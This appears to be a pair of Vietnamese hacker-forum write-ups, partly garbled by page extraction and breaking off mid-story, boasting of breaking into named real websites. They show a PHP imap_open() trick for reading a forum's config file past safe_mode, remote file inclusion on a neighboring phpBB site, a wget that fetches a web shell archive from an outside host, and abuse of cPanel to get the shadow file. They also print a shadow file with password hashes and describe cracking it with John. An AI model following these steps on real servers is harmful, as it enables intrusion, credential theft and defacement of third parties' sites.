Kiếm path của victim: Đây là bước cũng rất là quan trọng vì nếu muốn đập nhà mà không có địa chỉ làm sao mà đập?. Bây giờ mình cần biết info trong file config của forum nó!. 2 cái nêy cũ
Trang 1safe_mode: ON PHP version: 4.4.2 cURL: ON MySQL: ON MSSQL: OFF
PostgreSQL: OFF Oracle: OFF
Disable functions : NONE
2 Kiếm path của victim:
Đây là bước cũng rất là quan trọng vì nếu muốn đập nhà mà không có địa chỉ làm sao mà đập ? đập vào đâu ? victim nhà ở đâu ? Cách tốt nhất là vào web nó, kiếm những file nó code bị error nên hiện ra path ! thử nào
Tình cờ tui vào admincp của nó xem thế nào và có file vbmusic.php gì gì đó click vào :
boom trời giúp ta ! hiện ra error file /global.php is not found ! sht
path: để an toàn cho nhactre.biz nên path ở đây được che dấu 1 phần !
Code:
/mounted-storage/home19b/sub001/sc19699-SCRXP/nhactre.biz/forum/admincp/vbmusic.php
rồi attack nó nào uhmmmmm
read file() nó nào rồi php-bypass trong con nr57 không chơi được thử chiêu khác trong con shell cũng không ! lập tức tui vào đọc bài này:
https://hcegroup.biz/forums/showthread.php?t=440
rồi, áp dụng liền !
Bây giờ mình cần biết info trong file config của forum nó ! ->
/forum/includes/config.php
ô php eval()
Code:
$vnforce =
@imap_open("/mounted-storage/home19b/sub001/sc19699-SCRXP/nhactre.biz/forum/includes/config.php", "", "");
$result = @imap_body($vnforce, 1);
echo $result; @imap_close($vnforce);
sht ra roài hehe ! ngang đây thì chắc không cần nói tiếp nữa ! chúc vui tại HCE !
(c) HcEgRoUp.biz
?>
How I Hack Pleikucity.net
Hêc ! Ngồi chán chán hẽm biết lêm gì ! Nhớ hồi bữa có hack thằng Pleikucity.net
vì lý do xin cái style mê nó hẽmcho ! hêc !
Trang 2Hacked By : Windak , langtuhaohoa , yeuemdaikho ( hcegroup.net )
Okies ! Bắt đầu nèo
Mục tiêu : Pleikucity.net
Thông tin đã có về mục tiêu : Sêi shared hosting , Saì Open Source XOOPS ( 2 cái nêy cũng đủ để mần ăn nó rồi )
Sau mê dòng lượn que lượn lại lt cũng nhặt được vêi của rơi của XOOPS :
Inclusion file bug:
Code:
include_once
XOOPS_ROOT_PATH.'/language/'.$xoopsConfig['language'].'/misc.php';
Biết lê nó bị remote include file nhưng chã biết khai thác sao cả ! hêc ! Mò 1 hồi vẫn ko biết cách khai thác vì nếu muốn include file thì mình phải có 1 file misc.php trên host của victim nhưng bây giờ chưa có gì trong tay sao mê up file misc.php lên ??? mê nếu đã up được lên rồi thì cần gì sêi bug nêy nữa ??? hì hì ! Thiết nghĩ bug nêy vô dụng nên bỏ qua
Chuyển hướng sang local attack thữ xem ( cái trò nêy langtu cũng ko thick chút nêo nhưng buột thế rồi biết sao đây mục đêch của mình lê skin của thằng pleiku
để phát triển ý tưởng mê hêc *"18.gif"* )
lach cạch lạch cạch : whois.sc/pleikucity.net > reverse IP -> 350 Results for 67.15.40.4 (Pleikucity.net)
hêc hêc ! Bây giờ sao đây ?? ngồi dò xem thữ site nêo trong 350 đó dênh bug êh
??? huhuh má ơi
hừhm hừhm ! lt chọn phpBB lê mục tiêu vì phpBB có nhiều bug rất củ chuối có thể chiếm được quyền shell !
lụm được khoảng gần chục em sêi phpBB chọn đại 1 thằng vê lt chọn :
http://www.sickpuppyrecords.com/
kkhì khì ! loay hoay đâu khoảng 10 phút langtu đã có 1 shell ảo trên host nó thông
Trang 3qua bug remote include file ! hêc ! Vê việc bây giờ lê phải lêm sao up được 1 con remv php lên host để tiện cho việc sữ dụng sau nêy ! OKies
Code:
ls -al
thấy folder uploads của nó chmod 777 nên ta sẽ up vêo đó ! nhưng up nếu up trực tiếp = file php thì sẽ ko được vì *nix ko chấp nhẪn ! như vẪy ta dùng :
Code:
cd /uploads
Code:
wget haylam.com/xxx/c98.zip
Code:
unzip c98.zip
bây giờ thữ xem :
http://www.sickpuppyrecords.com/phpBB/uploads/c98.php
ặc ặc đã thênh công Vì mới nãy ta up thông qua exploit của forum nên ta cũng có owner tương đương với user của nó lê : sickpupp/sickpupp
hihi ! có lẽ đã nhai được cái gì goêi đây , serv nêy config hơi bị củ chuối
Code:
cat /home/sickpupp/.contactemail
OKies ! tiến hênh forgot pass login vêo Cpanel ! hehe ! Có 1 Cpanel rồi lt tênh chơi trò forgot tiếp để vêo thằng Pleiku nhưng ko được Cpanel đã fix !
VẪy đênh thữ get root ? Okies !
Vêo ftp up lên con cgi-telnet rồi "ln " shadow file ra ! OK ! đã ln được shadow file nhưng chỉ có root mới sêi nó được ( điều dĩ nhiên ) Lợi dụng bug của Cpanel 9x loay hoay 1 hồi đã có file shadow trên máy ! hê hê
Code:
root:$1$.miKBOEg$JfX3vJw.O9FykqZPnURaW1:13126:0:99999:7:::
bin:*:12552:0:99999:7:::
daemon:*:12552:0:99999:7:::
Trang 4adm:*:12552:0:99999:7:::
lp:*:12552:0:99999:7:::
sync:*:12552:0:99999:7:::
shutdown:*:12552:0:99999:7:::
halt:*:12552:0:99999:7:::
mail:*:12552:0:99999:7:::
news:*:12552:0:99999:7:::
uucp:*:12552:0:99999:7:::
operator:*:12552:0:99999:7:::
games:*:12552:0:99999:7:::
gopher:*:12552:0:99999:7:::
ftp:*:12552:0:99999:7:::
nobody:*:12552:0:99999:7:::
rpm:!!:12552:0:99999:7:::
vcsa:!!:12552:0:99999:7:::
nscd:!!:12552:0:99999:7:::
sshd:!!:12552:0:99999:7:::
rpc:!!:12552:0:99999:7:::
rpcuser:!!:12552:0:99999:7:::
nfsnobody:!!:12552:0:99999:7:::
mailnull:!!:12552:0:99999:7:::
smmsp:!!:12552:0:99999:7:::
pcap:!!:12552:0:99999:7:::
xfs:!!:12552:0:99999:7:::
ntp:!!:12552:0:99999:7:::
desktop:!!:12552:0:99999:7:::
apache:!!:12552:0:99999:7:::
webalizer:!!:12552:0:99999:7:::
squid:!!:12552:0:99999:7:::
postfix:!!:12552:0:99999:7:::
netdump:!!:12552:0:99999:7:::
mysql:!!:12552::::::
admin:$1$PrSVkYWg$0C/Hd2YV1U./2ieVlHmom.:13126:0:99999:7::: cpanel:*:12552::::::
mailman:*:12552::::::
fanadmin:$1$qZPyxcUN$RbE9OFyZLvTRU4/JYj2MK0:13103:::::: fuitad14:$1$VHeHhUVS$3MUnZJCjId/o49hJ886aS/:12553::::::
crawfojj:$1$vbD6e7i9$aQfQIS6y2IW8gi9QpJJOv1:12556::::::
Trang 5
vì mục đêch an toên nên ko post hết chỉ tượng trưng thôi
oêi ! Mới đi ăn bún riu dưới LTKiệt ( tp.BMT ) về hơi no no Thôi cũng đênh viết tiếp cho kết thúc câu chuyện
Điều bây giờ tất yếu phải lêm lê lôi John ra crack shadow pass rồi
Chờ khoảng 1 tiếng thấy nó crack được khoảng hơn 40 pass , đợi tiếp , đợi wêi đợi wêi chã thấy ra pass root hay pleiku ! hêc ! Nãy giờ ngồi tiền net hết mẹ gần 7 ngên mê giờ có 5 ngên ! Gồng 2 ngên rồi ! hêc !
Sốt ruột quá , với lại thiết nghĩ sẽ crack ko ra được vì john chỉ crack được những pass đơn giản thôi ! hêc !
Giờ chẳng lẽ quay lại hack lại từ đầu ??? sót tiền net dã man nhưng vì mục tiêu nên quyết định chơi tiếp !
quay lại con cgi-telnet mới nãy mới up :
Code:
ls -al /home/pleiku/public_html/html/
folder uploads của nó chmod 777 thấy tưởng đâu ngon ăn up 1 em c98 lên !
Up thênh công thấy mừng mừng !
Liên qua browser : http://www.pleikucity.net/html/uploads/c98.php
oác oác oác sao lại error 500 ?? hêc ! Thữ up thêm vêi con nữa vẫn error 500 dù file perl hay php hêc !
Cảm thấy đau tiền net rồi nghen Bỏ tiền ra ngồi nãy giờ mê hem lêm được gì lê điên lắm á ! hêc !
Nghĩ đi nghĩ lại sao lại error 500 ?? Phải chăng serv nêy PHP chạy dưới dạng CGI
??? chắc lê thêa rồi ! hêc ! Với lại owner của mình lê sickpupp/sickpupp mê lại up sang chỗ của thằng pleiku/plieku liệu có được ko ?? vì còn noob nên bỏ qua vấn
đề nêy !
Trang 6Quay đi quay lại á chết bê mêy goêi nhá !
Còn nhớ mới nãy ta thấy XOOPS có 1 bug inclusion file ko ???